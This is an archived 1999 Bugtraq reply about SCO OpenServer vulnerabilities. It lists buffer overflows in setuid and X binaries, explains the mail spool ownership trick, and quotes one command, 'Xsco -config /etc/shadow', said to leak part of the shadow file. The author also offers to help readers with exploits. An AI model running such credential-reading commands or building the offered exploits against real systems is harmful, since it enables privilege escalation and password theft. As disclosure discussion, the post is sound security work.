Bugtraq mailing list archives
Re: SCO OpenServer Security Status
From: btellier () USA NET (Brock Tellier)
Date: Tue, 21 Dec 1999 14:31:36 MST
-snip-
UnixWare read/modify users' mail (/var/spool/mail) This is also not applicable on OpenServer. OpenServer's >equivalent
is /usr/spool/mail which has 1777 perms (world-writable, but >sticky so only owner can delete files). The local delivery agent will not deliver to a file not owned by the recipient; will not follow symlinks or write to a file with multiple names (hard links); and is designed to avoid race conditions.
The meat of this exploit is not only that the directory is mode 0777, but that, by SYSV standards (thanks to Aleph to clearing that up for me), we can change the owner of any file we own. Therefore, under OpenServer (SYSV based), we could still create a file, change the owner and have mail delivered to that user normally. I don't know if that OpenServer LDA will deliver to a file which is world-readable, however. -snip- I've marked in the Buffer Overflow list below which ones were known (in the sense of publicly posted) and which were not.
In addition to the first two vulnerabilities, we are also putting the finishing touches on another large collection of previously reported OpenServer vulnerabilities (and vulnerabilities we discovered ourselves) which will be available by December 25th. The current contents include (but will not be limited to): 1. Buffer overflows in: /usr/mmdf/chans/smtpsrvr * unknown /etc/killall * unknown /etc/popper * known or newer version of old exploit /usr/bin/mscreen * known or older version of old exploit /usr/bin/rlogin * unknown (same as UnixWare gethostbyname()?) /bin/su * unknown (same as UnixWare exploit?) /usr/lib/sysadm/termsh * unknown, but I remember doing some work on this
program. I'll re-post if I dig up my files on it.
/usr/lib/libX11.so.5.0 * all the X problems known 5 years ago /usr/lib/libXt.so.5.0 /usr/lib/libXmu.so.5.0 /usr/lib/libXaw.so.5.0 /usr/lib/libX11.a /usr/lib/libXt.a /usr/lib/libXmu.a /usr/lib/libXaw.a /usr/bin/X11/xterm * known /usr/bin/X11/xload * known /usr/bin/X11/scoterm * known /usr/bin/X11/scolock * known /usr/bin/X11/scosession * known /usr/bin/X11/scologin * known /usr/lpd/remote/rlpstat * known /usr/lpd/remote/cancel * known /usr/lpd/remote/lpmove * known
BTW, if any of you Bugtraq people are in serious need of OpenServer exploits for any of the above, I would be happy to help out. I'm interested in finding out what the bug in smtpsrvr is, in particular.
2. Algorithmic vulnerabilities in: /etc/sysadm.d/bin/userOsa: Can improperly write to privileged files
One of those complicated algorithmic symlink vulnerabilities :) known.
/usr/bin/X11/Xsco: Can improperly read privileged files (also buffer overflows)
Unknown, but: If I recall correctly, I reported this to SCO as a buffer overflow in -query <hostname> (with a long <hostname>). If there is an overflow there, I would suspect that OpenServer has the gethostbyname() overflow that UW7 has. My memory is just as shady on the "read privileged files" vulnerability. I think it was "Xsco -config /etc/shadow" that would print the first line of /etc/shadow in an error message.
/bin/hello: Can improperly acess privileged devices Allows transmission of dangerous characters
Dangerous characters? Unknown.
/bin/write: Allows transmission of dangerous characters
" " Unknown.
/bin/login: Corrupt /etc/dialups causes login failure Insufficient error checking
Unknown. Thanks to SCO for posting fix information publicly instead of only to www.sco.com/security and providing actual information about which programs are vulnerable (even if the information wasn't complete). I might've hoped for more timely fixes, but considering the sheer number of holes they had to deal with, I'm just glad they didn't wait until 5.0.6. Brock Tellier UNIX Systems Administrator Chicago, IL, USA btellier () usa net ____________________________________________________________________ Get free email and a permanent address at http://www.netaddress.com/?N=1
Current thread:
- SCO OpenServer Security Status Michael Almond (Dec 20)
- <Possible follow-ups>
- Re: SCO OpenServer Security Status Brock Tellier (Dec 21)